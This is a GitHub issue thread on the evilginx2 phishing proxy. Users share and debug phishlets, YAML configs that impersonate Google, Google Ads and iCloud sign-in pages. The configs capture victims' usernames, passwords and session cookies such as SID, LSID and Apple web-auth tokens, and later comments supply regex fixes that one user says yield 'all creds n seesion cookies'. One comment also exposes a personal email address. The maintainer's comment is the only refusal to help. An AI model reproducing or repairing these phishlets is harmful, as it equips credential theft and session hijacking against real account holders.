### ISSUE TITLE
google phishlet not capturing credentials

### ISSUE THREAD

**Issue by zenaze** [kgretzky/evilginx2#179]
`name: 'google'
author: '@zenaze'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true}
  - {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: true, is_landing: false}
sub_filters:
  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{triggers_on}/signin/', replace: 'https://{triggers_on}/signin/', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'href="://{triggers_on}', replace: 'href="https://ssl.{triggers_on}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{triggers_on}/CheckCookie', replace: 'https://{triggers_on}/CheckCookie', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
  - {triggers_on: 'ssl.gstatic.com', orig_sub: 'ssl', domain: 'gstatic.com', search: 'https://{triggers_on}', replace: 'https://ssl.{triggers_on}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/xhtml+xml', 'application/xml']}
auth_tokens:
  - domain: '.google.com'
    keys: ['SID', 'HSID', 'SSID', 'APISID', 'SAPISID', 'NID','CGIC','SNID', 'LSID','1P_JAR',]
  - domain: 'accounts.google.com'
    keys: ['GAPS', 'LSID']
credentials:
  username:
    key: 'Email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'passwd'
    search: '(.*)'
    type: 'post'
login:
  domain: 'accounts.google.com'
  path: '/signin/v2/identifier'
`
Above is my google yaml but something is wrong. it doesnt capture anything even after successful login.

**Comment by zenaze** [comment]
i got it capturing the credentials change it to `key: 'identifier'` and `key: 'password'` but its not capturing the cookies.

**Comment by kgretzky** [comment]
Unfortunately I can only help with fixing bugs in Evilginx. Helping to create phishlets is out of scope of the issue tracker.

**Comment by zenaze** [comment]
> @zenaze try
> auth_tokens:
> 
> * domain: '.google.com'
>   keys: ["SID", "HSID", "SSID", "APISID", "SAPISID", "NID"]
> * domain: 'accounts.google.com'
>   keys: ["GAPS", "LSID"]
>   credentials:
>   username:
>   key: 'f.req'
>   search: '],"([^"]_)"]$'
>   type: 'post'
>   password:
>   key: 'f.req'
>   search: ',["([^"]_)",'
>   type: 'post'
>   login:
>   domain: 'accounts.google.com'
>   path: 'ServiceLogin'

Thanks you are the best. That worked well. got all creds n seesion cookies.
Can you help with my icloud phishlet . Is not displaying the login page correctly

```
name: 'icloud'
author: '@zenaze'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'www.icloud', orig_sub: 'www', domain: 'icloud.com', session: true, is_landing: true}
  - {phish_sub: 'appleid.apple', orig_sub: 'appleid', domain: 'apple.com', session: true, is_landing: false}
sub_filters:
  - {triggers_on: 'www.icloud.com', orig_sub: 'www', domain: 'icloud.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'setup.icloud.com', orig_sub: 'setup', domain: 'icloud.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'idmsa.apple.com', orig_sub: 'idmsa', domain: 'apple.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'appleid.apple.com', orig_sub: 'appleid', domain: 'apple.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'edge.icloud.com', orig_sub: 'edge', domain: 'icloud.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'appleid.cdn-apple.com', orig_sub: 'appleid', domain: 'cdn-apple.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'feedbackws.icloud.com', orig_sub: 'feedbackws', domain: 'icloud.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
  - domain: 'icloud.com'
    keys: ['X_APPLE_WEB_KB-M473Y4DIKRFAYAWMHY0BLZFJZZA','X-APPLE-WEB-ID','X-APPLE-WEBAUTH-HSA-TRUST','X-APPLE-WEBAUTH-LOGIN','X-APPLE-WEBAUTH-PCS-Cloudkit','X-APPLE-WEBAUTH-PCS-Documents','X-APPLE-WEBAUTH-PCS-Mail','X-APPLE-WEBAUTH-PCS-News','X-APPLE-WEBAUTH-PCS-Notes','X-APPLE-WEBAUTH-PCS-Photos','X-APPLE-WEBAUTH-PCS-Safari','X-APPLE-WEBAUTH-PCS-Sharing','X-APPLE-WEBAUTH-TOKEN','X-APPLE-WEBAUTH-USER','X-APPLE-WEBAUTH-VALIDATE']
credentials:
  username:
    key: 'accountName'
    search: '(.*)'
    type: 'post'
  password:
    key: 'password'
    search: '(.*)'
    type: 'post'
login:
  domain: 'icloud.com'
  path: '/'

```

**Comment by ewhitman1** [comment]
@zenaze i am working on icloud but currently stuck at csrf policy error

**Comment by ewhitman1** [comment]
@zenaze currently tap yes aint working for me in google

**Comment by zenaze** [comment]
> @zenaze i am working on icloud but currently stuck at csrf policy error
am also stuck there. cant seem to find the solution any where

**Comment by Sara123984** [comment]
Very nice of you to share some of your work,

I want to go a little deeper and save some info in the ads.google.com but unfortunately i hit a wall.

After the user logs in normally, when redirecting to the desired subdomain, the phish domain breaks and redirects to main site.

Can any of you help? This is what i am using to capture credentials, but it breaks when redirecting to ads subdomain.
`author: '@asmc'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'ads', orig_sub: 'ads', domain: 'google.com', session: true, is_landing: false}
  - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true}
  - {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false}
  #- {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: false, is_landing: false}
  # Suggest: run command below evilginx2 console: phishlets get-url google https://myaccount.google.com/xxxxxxx, replace xxxxx to normal function url as your choice in the google account page
  - {phish_sub: 'www', orig_sub: 'www', domain: 'gstatic.com', session: true, is_landing: false}
sub_filters:
  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/', replace: 'https://{hostname}/signin/', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/speedbump/', replace: 'https://{hostname}/speedbump/', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'myaccount', domain: 'google.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'ssl', domain: 'gstatic.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/CheckCookie', replace: 'https://{hostname}/CheckCookie', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'ssl.gstatic.com', orig_sub: 'accounts', domain: 'google.com', search: 'href="http://{hostname}/_/signin/challenge', replace: 'href="http://{hostname}/_/signin/challenge', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'ssl.gstatic.com', orig_sub: 'ssl', domain: 'gstatic.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'ads.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/signin/', replace: 'https://{hostname}/signin/', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'ads.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/speedbump/', replace: 'https://{hostname}/speedbump/', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'ads.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'ads.google.com', orig_sub: 'myaccount', domain: 'google.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'ads.google.com', orig_sub: 'ssl', domain: 'gstatic.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'ads.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/CheckCookie', replace: 'https://{hostname}/CheckCookie', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'https://{hostname}/_/common/diagnostics/', replace: 'https://{hostname}/_/common/diagnostics/', mimes: ['text/html', 'application/json']}
auth_tokens:
  - domain: '.google.com'
    keys: ["SID", "HSID", "SSID", "APISID", "SAPISID", "NID"]
  - domain: 'accounts.google.com'
    keys: ["GAPS", "LSID"]
  - domain: 'ads.google.com'
    keys: ["_ga", "_gat", "_gid", "SAG"]
credentials:
  username:
    key: 'f.req'
    search: '\],"([^"]*)"\]$'
    type: 'post'
  password:
    key: 'f.req'
    search: ',\["([^"]*)",'
    type: 'post'
login:
  domain: 'ads.google.com'
  path: '/um/signin?subid=uk-en-et-g-aw-a-home-awhp_xin1_signin!o2'`

Also my email is sara.hernandezrosas@yahoo.com

**Comment by mac4533** [comment]
@zenaze @ewhitman1  i am having the same problem with icloud.com did you manage to fix the issue?

**Comment by bojanrodic** [comment]
@zenaze @ewhitman1 can you help about JS inject, whatever i do i stuck on yes

**Comment by stackerofwheat** [comment]
> @zenaze try
> auth_tokens:
> 
> * domain: '.google.com'
>   keys: ["SID", "HSID", "SSID", "APISID", "SAPISID", "NID"]
> * domain: 'accounts.google.com'
>   keys: ["GAPS", "LSID"]
>   credentials:
>   username:
>   key: 'f.req'
>   search: '],"([^"]_)"]$'
>   type: 'post'
>   password:
>   key: 'f.req'
>   search: ',["([^"]_)",'
>   type: 'post'
>   login:
>   domain: 'accounts.google.com'
>   path: 'ServiceLogin'

Evilginx gives parsing error regarding the regex in this line: **search: ',["([^"]_)",'**. Something regarding the close parenthesis.

**Comment by techieagle** [comment]
> @zenaze try
> auth_tokens:
> 
>     * domain: '.google.com'
>       keys: ["SID", "HSID", "SSID", "APISID", "SAPISID", "NID"]
> 
>     * domain: 'accounts.google.com'
>       keys: ["GAPS", "LSID"]
>       credentials:
>       username:
>       key: 'f.req'
>       search: '],"([^"]_)"]$'
>       type: 'post'
>       password:
>       key: 'f.req'
>       search: ',["([^"]_)",'
>       type: 'post'
>       login:
>       domain: 'accounts.google.com'
>       path: 'ServiceLogin'

Got this error,

 [err] failed to load phishlet 'google.yaml': missing `auth_tokens` section

**Comment by techieagle** [comment]
> @zenaze try
> auth_tokens:
> 
>     * domain: '.google.com'
>       keys: ["SID", "HSID", "SSID", "APISID", "SAPISID", "NID"]
> 
>     * domain: 'accounts.google.com'
>       keys: ["GAPS", "LSID"]
>       credentials:
>       username:
>       key: 'f.req'
>       search: '],"([^"]_)"]$'
>       type: 'post'
>       password:
>       key: 'f.req'
>       search: ',["([^"]_)",'
>       type: 'post'
>       login:
>       domain: 'accounts.google.com'
>       path: 'ServiceLogin'

 failed to load phishlet 'google.yaml': credentials: error parsing regexp: unexpected ): `,["([^"])",`

**Comment by iamtelo** [comment]
```
credentials:
  username:
    key: 'f.req'
    search: '\[*\[\"(.+?)\"'
    type: 'post'
  password:
    key: 'f.req'
    search: '\[.*\[\"(.+?)\"'
    type: 'post'
```
